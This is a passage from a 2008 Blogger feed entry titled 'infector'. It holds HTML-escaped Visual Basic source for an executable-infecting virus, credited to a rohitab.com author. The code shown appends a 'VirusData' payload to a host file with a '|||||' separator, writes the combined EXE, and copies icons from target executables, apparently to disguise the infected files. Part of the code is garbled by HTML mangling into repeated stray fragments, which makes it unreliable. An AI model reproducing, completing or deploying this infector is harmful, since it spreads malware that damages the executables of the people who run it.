&amp;amp; ".exe"&lt;br /&gt;&lt;br /&gt;Open sPath For Binary As #2&lt;br /&gt;VirusData = Space(LOF(2))&lt;br /&gt;Get 2, , VirusData&lt;br /&gt;Close #2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FinalEXE = VirusData &amp;amp; "|||||" &amp;amp; sData&lt;br /&gt;Open EXEPath For Binary As #3&lt;br /&gt;Put 3, , FinalEXE&lt;br /&gt;Close 3&lt;br /&gt;End If ' for check&lt;br /&gt;&lt;br /&gt;End If ' for |||||&lt;br /&gt;End Function&lt;br /&gt;&lt;br /&gt;Function GetIconFromEXE(ByVal eData As String, ByRef state As Boolean) As String&lt;br /&gt;&lt;br /&gt;Dim c As String, sNull As String, ss As String&lt;br /&gt;Dim sPath As String, sIcon As String&lt;br /&gt;Dim l As Long&lt;br /&gt;c = Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(1) &amp;amp; Chr$(0) &amp;amp; Chr$(1) &amp;amp; Chr$(0) &amp;amp; Chr$(32) &amp;amp; Chr$(32) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(168) &amp;amp; Chr$(8) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(22) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0)&lt;br /&gt;ss = "(" &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; " " &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; "@"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;i = InStr(1, eData, "MSVBVM")&lt;br /&gt;&lt;br /&gt;If i &gt; 0 Then&lt;br /&gt;'VB EXE&lt;br /&gt;i = InStr(1, eData, ss)&lt;br /&gt;If i &gt; 0 Then&lt;br /&gt;sIcon = Mid(eData, i)&lt;br /&gt;'sIcon = c &amp;amp; sIcon &amp;amp; sNull &amp;amp; Chr(255)&lt;br /&gt;sIcon = sIcon &amp;amp; sNull &amp;amp; Chr(255)&lt;br /&gt;GetIconFromEXE = sIcon&lt;br /&gt;state = True&lt;br /&gt;&lt;br /&gt;Exit Function&lt;br /&gt;End If&lt;br /&gt;Else ' Not Vb EXE so first search for last (... ...@ and compare the size&lt;br /&gt;i = InStr(1, eData, ss)&lt;br /&gt;If i &gt; 0 Then&lt;br /&gt;If Len(eData) - i &gt; 10000 Then&lt;br /&gt;i = InStrRev(eData, ss, Len(eData))&lt;br /&gt;If i &gt; 0 And Len(eData) - i &lt; sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData,"&gt; 0 Then&lt;br /&gt;'      l = 2350 - Len(sIcon)&lt;br /&gt;'      For i = 1 To l&lt;br /&gt;'          sNull = sNull &amp;amp; Chr(0)&lt;br /&gt;'      Next&lt;br /&gt;'  End If&lt;br /&gt;&lt;br /&gt;' sIcon = c &amp;amp; sIcon &amp;amp; sNull &amp;amp; Chr(255)&lt;br /&gt;sIcon = sIcon &amp;amp; sNull &amp;amp; Chr(255)&lt;br /&gt;GetIconFromEXE = sIcon&lt;br /&gt;state = True&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exit Function&lt;br /&gt;&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;state = False&lt;br /&gt;&lt;br /&gt;End Function&lt;br /&gt;Function AddBackSlash(strPath As String) As String&lt;br /&gt;If Right(strPath, 1) &lt;&gt; "\" Then&lt;br /&gt;AddBackSlash = strPath &amp;amp; "\"&lt;br /&gt;Else&lt;br /&gt;AddBackSlash = strPath&lt;br /&gt;End If&lt;br /&gt;End Function&lt;br /&gt;&lt;br /&gt;Private Sub Form_Unload(Cancel As Integer)&lt;br /&gt;End&lt;br /&gt;End Sub&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;References :&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;span style=""&gt;            &lt;/span&gt;Written By justin[Mohamed FaYeD] _&lt;br /&gt;&lt;span style=""&gt;           &lt;/span&gt;&lt;a href="mailto:Thensync@hotmail.com"&gt;Thensync@hotmail.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;a href="http://www.rohitab.com/"&gt;http://www.rohitab.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-4331181129015908333?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4331181129015908333'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4331181129015908333'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/06/infector.html' title='infector'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
